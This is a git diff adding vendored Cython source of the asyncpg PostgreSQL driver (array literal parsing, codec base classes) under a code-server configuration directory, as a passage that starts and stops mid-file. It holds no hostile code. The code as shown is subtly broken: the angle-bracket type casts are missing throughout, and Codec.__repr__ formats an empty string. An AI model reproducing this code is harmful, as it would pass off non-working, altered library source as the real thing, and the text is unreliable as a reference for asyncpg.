indexes[ARRAY_MAXDIM] + + for i in range(ndims): + array_len *= dims[i] + indexes[i] = 0 + strides[i] = NULL + + if array_len == 0: + # A multidimensional array with a zero-sized dimension? + return [] + + elif array_len < 0: + # Array length overflow + raise exceptions.ProtocolError('array length overflow') + + for i in range(array_len): + # Decode the element. + elem_len = hton.unpack_int32(frb_read(buf, 4)) + if elem_len == -1: + elem = None + else: + elem = decoder(settings, + frb_slice_from(elem_buf, buf, elem_len), + decoder_arg) + + # Take an explicit reference for PyList_SET_ITEM in the below + # loop expects this. + cpython.Py_INCREF(elem) + + # Iterate over array dimentions and put the element in + # the correctly nested sublist. + for j in reversed(range(ndims)): + if indexes[j] == 0: + # Allocate the list for this array level. + stride = cpython.PyList_New(dims[j]) + + strides[j] = stride + # Take an explicit reference for PyList_SET_ITEM below + # expects this. + cpython.Py_INCREF(stride) + + stride = strides[j] + cpython.PyList_SET_ITEM(stride, indexes[j], elem) + indexes[j] += 1 + + if indexes[j] == dims[j] and j != 0: + # This array level is full, continue the + # ascent in the dimensions so that this level + # sublist will be appened to the parent list. + elem = stride + # Reset the index, this will cause the + # new list to be allocated on the next + # iteration on this array axis. + indexes[j] = 0 + else: + break + + stride = strides[0] + # Since each element in strides has a refcount of 1, + # returning strides[0] will increment it to 2, so + # balance that. + cpython.Py_DECREF(stride) + return stride + + +cdef textarray_decode(ConnectionSettings settings, FRBuffer *buf, + decode_func_ex decoder, const void *decoder_arg, + Py_UCS4 typdelim): + cdef: + Py_UCS4 *array_text + str s + + # Make a copy of array data since we will be mutating it for + # the purposes of element decoding. + s = pgproto.text_decode(settings, buf) + array_text = cpythonx.PyUnicode_AsUCS4Copy(s) + + try: + return _textarray_decode( + settings, array_text, decoder, decoder_arg, typdelim) + except ValueError as e: + raise exceptions.ProtocolError( + 'malformed array literal {!r}: {}'.format(s, e.args[0])) + finally: + cpython.PyMem_Free(array_text) + + +cdef _textarray_decode(ConnectionSettings settings, + Py_UCS4 *array_text, + decode_func_ex decoder, + const void *decoder_arg, + Py_UCS4 typdelim): + + cdef: + bytearray array_bytes + list result + list new_stride + Py_UCS4 *ptr + int32_t ndims = 0 + int32_t ubound = 0 + int32_t lbound = 0 + int32_t dims[ARRAY_MAXDIM] + int32_t inferred_dims[ARRAY_MAXDIM] + int32_t inferred_ndims = 0 + void *strides[ARRAY_MAXDIM] + int32_t indexes[ARRAY_MAXDIM] + int32_t nest_level = 0 + int32_t item_level = 0 + bint end_of_array = False + + bint end_of_item = False + bint has_quoting = False + bint strip_spaces = False + bint in_quotes = False + Py_UCS4 *item_start + Py_UCS4 *item_ptr + Py_UCS4 *item_end + + int i + object item + str item_text + FRBuffer item_buf + char *pg_item_str + ssize_t pg_item_len + + ptr = array_text + + while True: + while apg_ascii_isspace(ptr[0]): + ptr += 1 + + if ptr[0] != '[': + # Finished parsing dimensions spec. + break + + ptr += 1 # '[' + + if ndims > ARRAY_MAXDIM: + raise ValueError( + 'number of array dimensions ({}) exceed the ' + 'maximum expected ({})'.format(ndims, ARRAY_MAXDIM)) + + ptr = apg_parse_int32(ptr, &ubound) + if ptr == NULL: + raise ValueError('missing array dimension value') + + if ptr[0] == ':': + ptr += 1 + lbound = ubound + + # [lower:upper] spec. We disregard the lbound for decoding. + ptr = apg_parse_int32(ptr, &ubound) + if ptr == NULL: + raise ValueError('missing array dimension value') + else: + lbound = 1 + + if ptr[0] != ']': + raise ValueError('missing \']\' after array dimensions') + + ptr += 1 # ']' + + dims[ndims] = ubound - lbound + 1 + ndims += 1 + + if ndims != 0: + # If dimensions were given, the '=' token is expected. + if ptr[0] != '=': + raise ValueError('missing \'=\' after array dimensions') + + ptr += 1 # '=' + + # Skip any whitespace after the '=', whitespace + # before was consumed in the above loop. + while apg_ascii_isspace(ptr[0]): + ptr += 1 + + # Infer the dimensions from the brace structure in the + # array literal body, and check that it matches the explicit + # spec. This also validates that the array literal is sane. + _infer_array_dims(ptr, typdelim, inferred_dims, &inferred_ndims) + + if inferred_ndims != ndims: + raise ValueError( + 'specified array dimensions do not match array content') + + for i in range(ndims): + if inferred_dims[i] != dims[i]: + raise ValueError( + 'specified array dimensions do not match array content') + else: + # Infer the dimensions from the brace structure in the array literal + # body. This also validates that the array literal is sane. + _infer_array_dims(ptr, typdelim, dims, &ndims) + + while not end_of_array: + # We iterate over the literal character by character + # and modify the string in-place removing the array-specific + # quoting and determining the boundaries of each element. + end_of_item = has_quoting = in_quotes = False + strip_spaces = True + + # Pointers to array element start, end, and the current pointer + # tracking the position where characters are written when + # escaping is folded. + item_start = item_end = item_ptr = ptr + item_level = 0 + + while not end_of_item: + if ptr[0] == '"': + in_quotes = not in_quotes + if in_quotes: + strip_spaces = False + else: + item_end = item_ptr + has_quoting = True + + elif ptr[0] == '\\': + # Quoted character, collapse the backslash. + ptr += 1 + has_quoting = True + item_ptr[0] = ptr[0] + item_ptr += 1 + strip_spaces = False + item_end = item_ptr + + elif in_quotes: + # Consume the string until we see the closing quote. + item_ptr[0] = ptr[0] + item_ptr += 1 + + elif ptr[0] == '{': + # Nesting level increase. + nest_level += 1 + + indexes[nest_level - 1] = 0 + new_stride = cpython.PyList_New(dims[nest_level - 1]) + strides[nest_level - 1] = \ + (new_stride) + + if nest_level > 1: + cpython.Py_INCREF(new_stride) + cpython.PyList_SET_ITEM( + strides[nest_level - 2], + indexes[nest_level - 2], + new_stride) + else: + result = new_stride + + elif ptr[0] == '}': + if item_level == 0: + # Make sure we keep track of which nesting + # level the item belongs to, as the loop + # will continue to consume closing braces + # until the delimiter or the end of input. + item_level = nest_level + + nest_level -= 1 + + if nest_level == 0: + end_of_array = end_of_item = True + + elif ptr[0] == typdelim: + # Array element delimiter, + end_of_item = True + if item_level == 0: + item_level = nest_level + + elif apg_ascii_isspace(ptr[0]): + if not strip_spaces: + item_ptr[0] = ptr[0] + item_ptr += 1 + # Ignore the leading literal whitespace. + + else: + item_ptr[0] = ptr[0] + item_ptr += 1 + strip_spaces = False + item_end = item_ptr + + ptr += 1 + + # end while not end_of_item + + if item_end == item_start: + # Empty array + continue + + item_end[0] = '\0' + + if not has_quoting and apg_strcasecmp(item_start, APG_NULL) == 0: + # NULL element. + item = None + else: + # XXX: find a way to avoid the redundant encode/decode + # cycle here. + item_text = cpythonx.PyUnicode_FromKindAndData( + cpythonx.PyUnicode_4BYTE_KIND, + item_start, + item_end - item_start) + + # Prepare the element buffer and call the text decoder + # for the element type. + pgproto.as_pg_string_and_size( + settings, item_text, &pg_item_str, &pg_item_len) + frb_init(&item_buf, pg_item_str, pg_item_len) + item = decoder(settings, &item_buf, decoder_arg) + + # Place the decoded element in the array. + cpython.Py_INCREF(item) + cpython.PyList_SET_ITEM( + strides[item_level - 1], + indexes[item_level - 1], + item) + + if nest_level > 0: + indexes[nest_level - 1] += 1 + + return result + + +cdef enum _ArrayParseState: + APS_START = 1 + APS_STRIDE_STARTED = 2 + APS_STRIDE_DONE = 3 + APS_STRIDE_DELIMITED = 4 + APS_ELEM_STARTED = 5 + APS_ELEM_DELIMITED = 6 + + +cdef _UnexpectedCharacter(const Py_UCS4 *array_text, const Py_UCS4 *ptr): + return ValueError('unexpected character {!r} at position {}'.format( + cpython.PyUnicode_FromOrdinal(ptr[0]), ptr - array_text + 1)) + + +cdef _infer_array_dims(const Py_UCS4 *array_text, + Py_UCS4 typdelim, + int32_t *dims, + int32_t *ndims): + cdef: + const Py_UCS4 *ptr = array_text + int i + int nest_level = 0 + bint end_of_array = False + bint end_of_item = False + bint in_quotes = False + bint array_is_empty = True + int stride_len[ARRAY_MAXDIM] + int prev_stride_len[ARRAY_MAXDIM] + _ArrayParseState parse_state = APS_START + + for i in range(ARRAY_MAXDIM): + dims[i] = prev_stride_len[i] = 0 + stride_len[i] = 1 + + while not end_of_array: + end_of_item = False + + while not end_of_item: + if ptr[0] == '\0': + raise ValueError('unexpected end of string') + + elif ptr[0] == '"': + if (parse_state not in (APS_STRIDE_STARTED, + APS_ELEM_DELIMITED) and + not (parse_state == APS_ELEM_STARTED and in_quotes)): + raise _UnexpectedCharacter(array_text, ptr) + + in_quotes = not in_quotes + if in_quotes: + parse_state = APS_ELEM_STARTED + array_is_empty = False + + elif ptr[0] == '\\': + if parse_state not in (APS_STRIDE_STARTED, + APS_ELEM_STARTED, + APS_ELEM_DELIMITED): + raise _UnexpectedCharacter(array_text, ptr) + + parse_state = APS_ELEM_STARTED + array_is_empty = False + + if ptr[1] != '\0': + ptr += 1 + else: + raise ValueError('unexpected end of string') + + elif in_quotes: + # Ignore everything inside the quotes. + pass + + elif ptr[0] == '{': + if parse_state not in (APS_START, + APS_STRIDE_STARTED, + APS_STRIDE_DELIMITED): + raise _UnexpectedCharacter(array_text, ptr) + + parse_state = APS_STRIDE_STARTED + if nest_level >= ARRAY_MAXDIM: + raise ValueError( + 'number of array dimensions ({}) exceed the ' + 'maximum expected ({})'.format( + nest_level, ARRAY_MAXDIM)) + + dims[nest_level] = 0 + nest_level += 1 + if ndims[0] < nest_level: + ndims[0] = nest_level + + elif ptr[0] == '}': + if (parse_state not in (APS_ELEM_STARTED, APS_STRIDE_DONE) and + not (nest_level == 1 and + parse_state == APS_STRIDE_STARTED)): + raise _UnexpectedCharacter(array_text, ptr) + + parse_state = APS_STRIDE_DONE + + if nest_level == 0: + raise _UnexpectedCharacter(array_text, ptr) + + nest_level -= 1 + + if (prev_stride_len[nest_level] != 0 and + stride_len[nest_level] != prev_stride_len[nest_level]): + raise ValueError( + 'inconsistent sub-array dimensions' + ' at position {}'.format( + ptr - array_text + 1)) + + prev_stride_len[nest_level] = stride_len[nest_level] + stride_len[nest_level] = 1 + if nest_level == 0: + end_of_array = end_of_item = True + else: + dims[nest_level - 1] += 1 + + elif ptr[0] == typdelim: + if parse_state not in (APS_ELEM_STARTED, APS_STRIDE_DONE): + raise _UnexpectedCharacter(array_text, ptr) + + if parse_state == APS_STRIDE_DONE: + parse_state = APS_STRIDE_DELIMITED + else: + parse_state = APS_ELEM_DELIMITED + end_of_item = True + stride_len[nest_level - 1] += 1 + + elif not apg_ascii_isspace(ptr[0]): + if parse_state not in (APS_STRIDE_STARTED, + APS_ELEM_STARTED, + APS_ELEM_DELIMITED): + raise _UnexpectedCharacter(array_text, ptr) + + parse_state = APS_ELEM_STARTED + array_is_empty = False + + if not end_of_item: + ptr += 1 + + if not array_is_empty: + dims[ndims[0] - 1] += 1 + + ptr += 1 + + # only whitespace is allowed after the closing brace + while ptr[0] != '\0': + if not apg_ascii_isspace(ptr[0]): + raise _UnexpectedCharacter(array_text, ptr) + + ptr += 1 + + if array_is_empty: + ndims[0] = 0 + + +cdef uint4_encode_ex(ConnectionSettings settings, WriteBuffer buf, object obj, + const void *arg): + return pgproto.uint4_encode(settings, buf, obj) + + +cdef uint4_decode_ex(ConnectionSettings settings, FRBuffer *buf, + const void *arg): + return pgproto.uint4_decode(settings, buf) + + +cdef arrayoid_encode(ConnectionSettings settings, WriteBuffer buf, items): + array_encode(settings, buf, items, OIDOID, + &uint4_encode_ex, NULL) + + +cdef arrayoid_decode(ConnectionSettings settings, FRBuffer *buf): + return array_decode(settings, buf, &uint4_decode_ex, NULL) + + +cdef text_encode_ex(ConnectionSettings settings, WriteBuffer buf, object obj, + const void *arg): + return pgproto.text_encode(settings, buf, obj) + + +cdef text_decode_ex(ConnectionSettings settings, FRBuffer *buf, + const void *arg): + return pgproto.text_decode(settings, buf) + + +cdef arraytext_encode(ConnectionSettings settings, WriteBuffer buf, items): + array_encode(settings, buf, items, TEXTOID, + &text_encode_ex, NULL) + + +cdef arraytext_decode(ConnectionSettings settings, FRBuffer *buf): + return array_decode(settings, buf, &text_decode_ex, NULL) + + +cdef init_array_codecs(): + # oid[] and text[] are registered as core codecs + # to make type introspection query work + # + register_core_codec(_OIDOID, + &arrayoid_encode, + &arrayoid_decode, + PG_FORMAT_BINARY) + + register_core_codec(_TEXTOID, + &arraytext_encode, + &arraytext_decode, + PG_FORMAT_BINARY) + +init_array_codecs() diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/base.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/base.pxd new file mode 100755 index 0000000..f549259 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/base.pxd @@ -0,0 +1,199 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +ctypedef object (*encode_func)(ConnectionSettings settings, + WriteBuffer buf, + object obj) + +ctypedef object (*decode_func)(ConnectionSettings settings, + FRBuffer *buf) + +ctypedef object (*codec_encode_func)(Codec codec, + ConnectionSettings settings, + WriteBuffer buf, + object obj) + +ctypedef object (*codec_decode_func)(Codec codec, + ConnectionSettings settings, + FRBuffer *buf) + + +cdef class CodecMap: + cdef: + void** binary_codec_map + void** text_codec_map + dict extra_codecs + + cdef inline void *get_binary_codec_ptr(self, uint32_t idx) + cdef inline void set_binary_codec_ptr(self, uint32_t idx, void *ptr) + cdef inline void *get_text_codec_ptr(self, uint32_t idx) + cdef inline void set_text_codec_ptr(self, uint32_t idx, void *ptr) + + +cdef enum CodecType: + CODEC_UNDEFINED = 0 + CODEC_C = 1 + CODEC_PY = 2 + CODEC_ARRAY = 3 + CODEC_COMPOSITE = 4 + CODEC_RANGE = 5 + CODEC_MULTIRANGE = 6 + + +cdef enum ServerDataFormat: + PG_FORMAT_ANY = -1 + PG_FORMAT_TEXT = 0 + PG_FORMAT_BINARY = 1 + + +cdef enum ClientExchangeFormat: + PG_XFORMAT_OBJECT = 1 + PG_XFORMAT_TUPLE = 2 + + +cdef class Codec: + cdef: + uint32_t oid + + str name + str schema + str kind + + CodecType type + ServerDataFormat format + ClientExchangeFormat xformat + + encode_func c_encoder + decode_func c_decoder + Codec base_codec + + object py_encoder + object py_decoder + + # arrays + Codec element_codec + Py_UCS4 element_delimiter + + # composite types + tuple element_type_oids + object element_names + object record_desc + list element_codecs + + # Pointers to actual encoder/decoder functions for this codec + codec_encode_func encoder + codec_decode_func decoder + + cdef init(self, str name, str schema, str kind, + CodecType type, ServerDataFormat format, + ClientExchangeFormat xformat, + encode_func c_encoder, decode_func c_decoder, + Codec base_codec, + object py_encoder, object py_decoder, + Codec element_codec, tuple element_type_oids, + object element_names, list element_codecs, + Py_UCS4 element_delimiter) + + cdef encode_scalar(self, ConnectionSettings settings, WriteBuffer buf, + object obj) + + cdef encode_array(self, ConnectionSettings settings, WriteBuffer buf, + object obj) + + cdef encode_array_text(self, ConnectionSettings settings, WriteBuffer buf, + object obj) + + cdef encode_range(self, ConnectionSettings settings, WriteBuffer buf, + object obj) + + cdef encode_multirange(self, ConnectionSettings settings, WriteBuffer buf, + object obj) + + cdef encode_composite(self, ConnectionSettings settings, WriteBuffer buf, + object obj) + + cdef encode_in_python(self, ConnectionSettings settings, WriteBuffer buf, + object obj) + + cdef decode_scalar(self, ConnectionSettings settings, FRBuffer *buf) + + cdef decode_array(self, ConnectionSettings settings, FRBuffer *buf) + + cdef decode_array_text(self, ConnectionSettings settings, FRBuffer *buf) + + cdef decode_range(self, ConnectionSettings settings, FRBuffer *buf) + + cdef decode_multirange(self, ConnectionSettings settings, FRBuffer *buf) + + cdef decode_composite(self, ConnectionSettings settings, FRBuffer *buf) + + cdef decode_in_python(self, ConnectionSettings settings, FRBuffer *buf) + + cdef inline encode(self, + ConnectionSettings settings, + WriteBuffer buf, + object obj) + + cdef inline decode(self, ConnectionSettings settings, FRBuffer *buf) + + cdef has_encoder(self) + cdef has_decoder(self) + cdef is_binary(self) + + cdef inline Codec copy(self) + + @staticmethod + cdef Codec new_array_codec(uint32_t oid, + str name, + str schema, + Codec element_codec, + Py_UCS4 element_delimiter) + + @staticmethod + cdef Codec new_range_codec(uint32_t oid, + str name, + str schema, + Codec element_codec) + + @staticmethod + cdef Codec new_multirange_codec(uint32_t oid, + str name, + str schema, + Codec element_codec) + + @staticmethod + cdef Codec new_composite_codec(uint32_t oid, + str name, + str schema, + ServerDataFormat format, + list element_codecs, + tuple element_type_oids, + object element_names) + + @staticmethod + cdef Codec new_python_codec(uint32_t oid, + str name, + str schema, + str kind, + object encoder, + object decoder, + encode_func c_encoder, + decode_func c_decoder, + Codec base_codec, + ServerDataFormat format, + ClientExchangeFormat xformat) + + +cdef class DataCodecConfig: + cdef: + dict _derived_type_codecs + dict _custom_type_codecs + + cdef inline Codec get_codec(self, uint32_t oid, ServerDataFormat format, + bint ignore_custom_codec=*) + cdef inline Codec get_custom_codec(self, uint32_t oid, + ServerDataFormat format) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/base.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/base.pyx new file mode 100755 index 0000000..009598a --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs/base.pyx @@ -0,0 +1,922 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from collections.abc import Mapping as MappingABC + +import asyncpg +from asyncpg import exceptions + + +# The class indirection is needed because Cython +# does not (as of 3.1.0) store global cdef variables +# in module state. +@cython.final +cdef class CodecMap: + + def __cinit__(self): + self.extra_codecs = {} + self.binary_codec_map = cpython.PyMem_Calloc( + (MAXSUPPORTEDOID + 1) * 2, sizeof(void *)) + self.text_codec_map = cpython.PyMem_Calloc( + (MAXSUPPORTEDOID + 1) * 2, sizeof(void *)) + + cdef inline void *get_binary_codec_ptr(self, uint32_t idx): + return self.binary_codec_map[idx] + + cdef inline void set_binary_codec_ptr(self, uint32_t idx, void *ptr): + self.binary_codec_map[idx] = ptr + + cdef inline void *get_text_codec_ptr(self, uint32_t idx): + return self.text_codec_map[idx] + + cdef inline void set_text_codec_ptr(self, uint32_t idx, void *ptr): + self.text_codec_map[idx] = ptr + + +codec_map = CodecMap() + + +@cython.final +cdef class Codec: + + def __cinit__(self, uint32_t oid): + self.oid = oid + self.type = CODEC_UNDEFINED + + cdef init( + self, + str name, + str schema, + str kind, + CodecType type, + ServerDataFormat format, + ClientExchangeFormat xformat, + encode_func c_encoder, + decode_func c_decoder, + Codec base_codec, + object py_encoder, + object py_decoder, + Codec element_codec, + tuple element_type_oids, + object element_names, + list element_codecs, + Py_UCS4 element_delimiter, + ): + + self.name = name + self.schema = schema + self.kind = kind + self.type = type + self.format = format + self.xformat = xformat + self.c_encoder = c_encoder + self.c_decoder = c_decoder + self.base_codec = base_codec + self.py_encoder = py_encoder + self.py_decoder = py_decoder + self.element_codec = element_codec + self.element_type_oids = element_type_oids + self.element_codecs = element_codecs + self.element_delimiter = element_delimiter + self.element_names = element_names + + if base_codec is not None: + if c_encoder != NULL or c_decoder != NULL: + raise exceptions.InternalClientError( + 'base_codec is mutually exclusive with c_encoder/c_decoder' + ) + + if element_names is not None: + self.record_desc = RecordDescriptor( + element_names, tuple(element_names)) + else: + self.record_desc = None + + if type == CODEC_C: + self.encoder = &self.encode_scalar + self.decoder = &self.decode_scalar + elif type == CODEC_ARRAY: + if format == PG_FORMAT_BINARY: + self.encoder = &self.encode_array + self.decoder = &self.decode_array + else: + self.encoder = &self.encode_array_text + self.decoder = &self.decode_array_text + elif type == CODEC_RANGE: + if format != PG_FORMAT_BINARY: + raise exceptions.UnsupportedClientFeatureError( + 'cannot decode type "{}"."{}": text encoding of ' + 'range types is not supported'.format(schema, name)) + self.encoder = &self.encode_range + self.decoder = &self.decode_range + elif type == CODEC_MULTIRANGE: + if format != PG_FORMAT_BINARY: + raise exceptions.UnsupportedClientFeatureError( + 'cannot decode type "{}"."{}": text encoding of ' + 'range types is not supported'.format(schema, name)) + self.encoder = &self.encode_multirange + self.decoder = &self.decode_multirange + elif type == CODEC_COMPOSITE: + if format != PG_FORMAT_BINARY: + raise exceptions.UnsupportedClientFeatureError( + 'cannot decode type "{}"."{}": text encoding of ' + 'composite types is not supported'.format(schema, name)) + self.encoder = &self.encode_composite + self.decoder = &self.decode_composite + elif type == CODEC_PY: + self.encoder = &self.encode_in_python + self.decoder = &self.decode_in_python + else: + raise exceptions.InternalClientError( + 'unexpected codec type: {}'.format(type)) + + cdef Codec copy(self): + cdef Codec codec + + codec = Codec(self.oid) + codec.init(self.name, self.schema, self.kind, + self.type, self.format, self.xformat, + self.c_encoder, self.c_decoder, self.base_codec, + self.py_encoder, self.py_decoder, + self.element_codec, + self.element_type_oids, self.element_names, + self.element_codecs, self.element_delimiter) + + return codec + + cdef encode_scalar(self, ConnectionSettings settings, WriteBuffer buf, + object obj): + self.c_encoder(settings, buf, obj) + + cdef encode_array(self, ConnectionSettings settings, WriteBuffer buf, + object obj): + array_encode(settings, buf, obj, self.element_codec.oid, + codec_encode_func_ex, + (self.element_codec)) + + cdef encode_array_text(self, ConnectionSettings settings, WriteBuffer buf, + object obj): + return textarray_encode(settings, buf, obj, + codec_encode_func_ex, + (self.element_codec), + self.element_delimiter) + + cdef encode_range(self, ConnectionSettings settings, WriteBuffer buf, + object obj): + range_encode(settings, buf, obj, self.element_codec.oid, + codec_encode_func_ex, + (self.element_codec)) + + cdef encode_multirange(self, ConnectionSettings settings, WriteBuffer buf, + object obj): + multirange_encode(settings, buf, obj, self.element_codec.oid, + codec_encode_func_ex, + (self.element_codec)) + + cdef encode_composite(self, ConnectionSettings settings, WriteBuffer buf, + object obj): + cdef: + WriteBuffer elem_data + int i + list elem_codecs = self.element_codecs + ssize_t count + ssize_t composite_size + tuple rec + + if isinstance(obj, MappingABC): + # Input is dict-like, form a tuple + composite_size = len(self.element_type_oids) + rec = cpython.PyTuple_New(composite_size) + + for i in range(composite_size): + cpython.Py_INCREF(None) + cpython.PyTuple_SET_ITEM(rec, i, None) + + for field in obj: + try: + i = self.element_names[field] + except KeyError: + raise ValueError( + '{!r} is not a valid element of composite ' + 'type {}'.format(field, self.name)) from None + + item = obj[field] + cpython.Py_INCREF(item) + cpython.PyTuple_SET_ITEM(rec, i, item) + + obj = rec + + count = len(obj) + if count > _MAXINT32: + raise ValueError('too many elements in composite type record') + + elem_data = WriteBuffer.new() + i = 0 + for item in obj: + elem_data.write_int32(self.element_type_oids[i]) + if item is None: + elem_data.write_int32(-1) + else: + (elem_codecs[i]).encode(settings, elem_data, item) + i += 1 + + record_encode_frame(settings, buf, elem_data, count) + + cdef encode_in_python(self, ConnectionSettings settings, WriteBuffer buf, + object obj): + data = self.py_encoder(obj) + if self.xformat == PG_XFORMAT_OBJECT: + if self.format == PG_FORMAT_BINARY: + pgproto.bytea_encode(settings, buf, data) + elif self.format == PG_FORMAT_TEXT: + pgproto.text_encode(settings, buf, data) + else: + raise exceptions.InternalClientError( + 'unexpected data format: {}'.format(self.format)) + elif self.xformat == PG_XFORMAT_TUPLE: + if self.base_codec is not None: + self.base_codec.encode(settings, buf, data) + else: + self.c_encoder(settings, buf, data) + else: + raise exceptions.InternalClientError( + 'unexpected exchange format: {}'.format(self.xformat)) + + cdef encode(self, ConnectionSettings settings, WriteBuffer buf, + object obj): + return self.encoder(self, settings, buf, obj) + + cdef decode_scalar(self, ConnectionSettings settings, FRBuffer *buf): + return self.c_decoder(settings, buf) + + cdef decode_array(self, ConnectionSettings settings, FRBuffer *buf): + return array_decode(settings, buf, codec_decode_func_ex, + (self.element_codec)) + + cdef decode_array_text(self, ConnectionSettings settings, + FRBuffer *buf): + return textarray_decode(settings, buf, codec_decode_func_ex, + (self.element_codec), + self.element_delimiter) + + cdef decode_range(self, ConnectionSettings settings, FRBuffer *buf): + return range_decode(settings, buf, codec_decode_func_ex, + (self.element_codec)) + + cdef decode_multirange(self, ConnectionSettings settings, FRBuffer *buf): + return multirange_decode(settings, buf, codec_decode_func_ex, + (self.element_codec)) + + cdef decode_composite(self, ConnectionSettings settings, + FRBuffer *buf): + cdef: + object result + ssize_t elem_count + ssize_t i + int32_t elem_len + uint32_t elem_typ + uint32_t received_elem_typ + Codec elem_codec + FRBuffer elem_buf + + elem_count = hton.unpack_int32(frb_read(buf, 4)) + if elem_count != len(self.element_type_oids): + raise exceptions.OutdatedSchemaCacheError( + 'unexpected number of attributes of composite type: ' + '{}, expected {}' + .format( + elem_count, + len(self.element_type_oids), + ), + schema=self.schema, + data_type=self.name, + ) + result = self.record_desc.make_record(asyncpg.Record, elem_count) + for i in range(elem_count): + elem_typ = self.element_type_oids[i] + received_elem_typ = hton.unpack_int32(frb_read(buf, 4)) + + if received_elem_typ != elem_typ: + raise exceptions.OutdatedSchemaCacheError( + 'unexpected data type of composite type attribute {}: ' + '{!r}, expected {!r}' + .format( + i, + BUILTIN_TYPE_OID_MAP.get( + received_elem_typ, received_elem_typ), + BUILTIN_TYPE_OID_MAP.get( + elem_typ, elem_typ) + ), + schema=self.schema, + data_type=self.name, + position=i, + ) + + elem_len = hton.unpack_int32(frb_read(buf, 4)) + if elem_len == -1: + elem = None + else: + elem_codec = self.element_codecs[i] + elem = elem_codec.decode( + settings, frb_slice_from(&elem_buf, buf, elem_len)) + + cpython.Py_INCREF(elem) + recordcapi.ApgRecord_SET_ITEM(result, i, elem) + + return result + + cdef decode_in_python(self, ConnectionSettings settings, + FRBuffer *buf): + if self.xformat == PG_XFORMAT_OBJECT: + if self.format == PG_FORMAT_BINARY: + data = pgproto.bytea_decode(settings, buf) + elif self.format == PG_FORMAT_TEXT: + data = pgproto.text_decode(settings, buf) + else: + raise exceptions.InternalClientError( + 'unexpected data format: {}'.format(self.format)) + elif self.xformat == PG_XFORMAT_TUPLE: + if self.base_codec is not None: + data = self.base_codec.decode(settings, buf) + else: + data = self.c_decoder(settings, buf) + else: + raise exceptions.InternalClientError( + 'unexpected exchange format: {}'.format(self.xformat)) + + return self.py_decoder(data) + + cdef inline decode(self, ConnectionSettings settings, FRBuffer *buf): + return self.decoder(self, settings, buf) + + cdef inline has_encoder(self): + cdef Codec elem_codec + + if self.c_encoder is not NULL or self.py_encoder is not None: + return True + + elif ( + self.type == CODEC_ARRAY + or self.type == CODEC_RANGE + or self.type == CODEC_MULTIRANGE + ): + return self.element_codec.has_encoder() + + elif self.type == CODEC_COMPOSITE: + for elem_codec in self.element_codecs: + if not elem_codec.has_encoder(): + return False + return True + + else: + return False + + cdef has_decoder(self): + cdef Codec elem_codec + + if self.c_decoder is not NULL or self.py_decoder is not None: + return True + + elif ( + self.type == CODEC_ARRAY + or self.type == CODEC_RANGE + or self.type == CODEC_MULTIRANGE + ): + return self.element_codec.has_decoder() + + elif self.type == CODEC_COMPOSITE: + for elem_codec in self.element_codecs: + if not elem_codec.has_decoder(): + return False + return True + + else: + return False + + cdef is_binary(self): + return self.format == PG_FORMAT_BINARY + + def __repr__(self): + return ''.format( + self.oid, + 'NA' if self.element_codec is None else self.element_codec.oid, + has_core_codec(self.oid)) + + @staticmethod + cdef Codec new_array_codec(uint32_t oid, + str name, + str schema, + Codec element_codec, + Py_UCS4 element_delimiter): + cdef Codec codec + codec = Codec(oid) + codec.init(name, schema, 'array', CODEC_ARRAY, element_codec.format, + PG_XFORMAT_OBJECT, NULL, NULL, None, None, None, + element_codec, None, None, None, element_delimiter) + return codec + + @staticmethod + cdef Codec new_range_codec(uint32_t oid, + str name, + str schema, + Codec element_codec): + cdef Codec codec + codec = Codec(oid) + codec.init(name, schema, 'range', CODEC_RANGE, element_codec.format, + PG_XFORMAT_OBJECT, NULL, NULL, None, None, None, + element_codec, None, None, None, 0) + return codec + + @staticmethod + cdef Codec new_multirange_codec(uint32_t oid, + str name, + str schema, + Codec element_codec): + cdef Codec codec + codec = Codec(oid) + codec.init(name, schema, 'multirange', CODEC_MULTIRANGE, + element_codec.format, PG_XFORMAT_OBJECT, NULL, NULL, None, + None, None, element_codec, None, None, None, 0) + return codec + + @staticmethod + cdef Codec new_composite_codec(uint32_t oid, + str name, + str schema, + ServerDataFormat format, + list element_codecs, + tuple element_type_oids, + object element_names): + cdef Codec codec + codec = Codec(oid) + codec.init(name, schema, 'composite', CODEC_COMPOSITE, + format, PG_XFORMAT_OBJECT, NULL, NULL, None, None, None, + None, element_type_oids, element_names, element_codecs, 0) + return codec + + @staticmethod + cdef Codec new_python_codec(uint32_t oid, + str name, + str schema, + str kind, + object encoder, + object decoder, + encode_func c_encoder, + decode_func c_decoder, + Codec base_codec, + ServerDataFormat format, + ClientExchangeFormat xformat): + cdef Codec codec + codec = Codec(oid) + codec.init(name, schema, kind, CODEC_PY, format, xformat, + c_encoder, c_decoder, base_codec, encoder, decoder, + None, None, None, None, 0) + return codec + + +# Encode callback for arrays +cdef codec_encode_func_ex(ConnectionSettings settings, WriteBuffer buf, + object obj, const void *arg): + return (arg).encode(settings, buf, obj) + + +# Decode callback for arrays +cdef codec_decode_func_ex(ConnectionSettings settings, FRBuffer *buf, + const void *arg): + return (arg).decode(settings, buf) + + +cdef uint32_t pylong_as_oid(val) except? 0xFFFFFFFFl: + cdef: + int64_t oid = 0 + bint overflow = False + + try: + oid = cpython.PyLong_AsLongLong(val) + except OverflowError: + overflow = True + + if overflow or (oid < 0 or oid > UINT32_MAX): + raise OverflowError('OID value too large: {!r}'.format(val)) + + return val + + +cdef class DataCodecConfig: + def __init__(self): + # Codec instance cache for derived types: + # composites, arrays, ranges, domains and their combinations. + self._derived_type_codecs = {} + # Codec instances set up by the user for the connection. + self._custom_type_codecs = {} + + def add_types(self, types): + cdef: + Codec elem_codec + list comp_elem_codecs + ServerDataFormat format + ServerDataFormat elem_format + bint has_text_elements + Py_UCS4 elem_delim + + for ti in types: + oid = ti['oid'] + + if self.get_codec(oid, PG_FORMAT_ANY) is not None: + continue + + name = 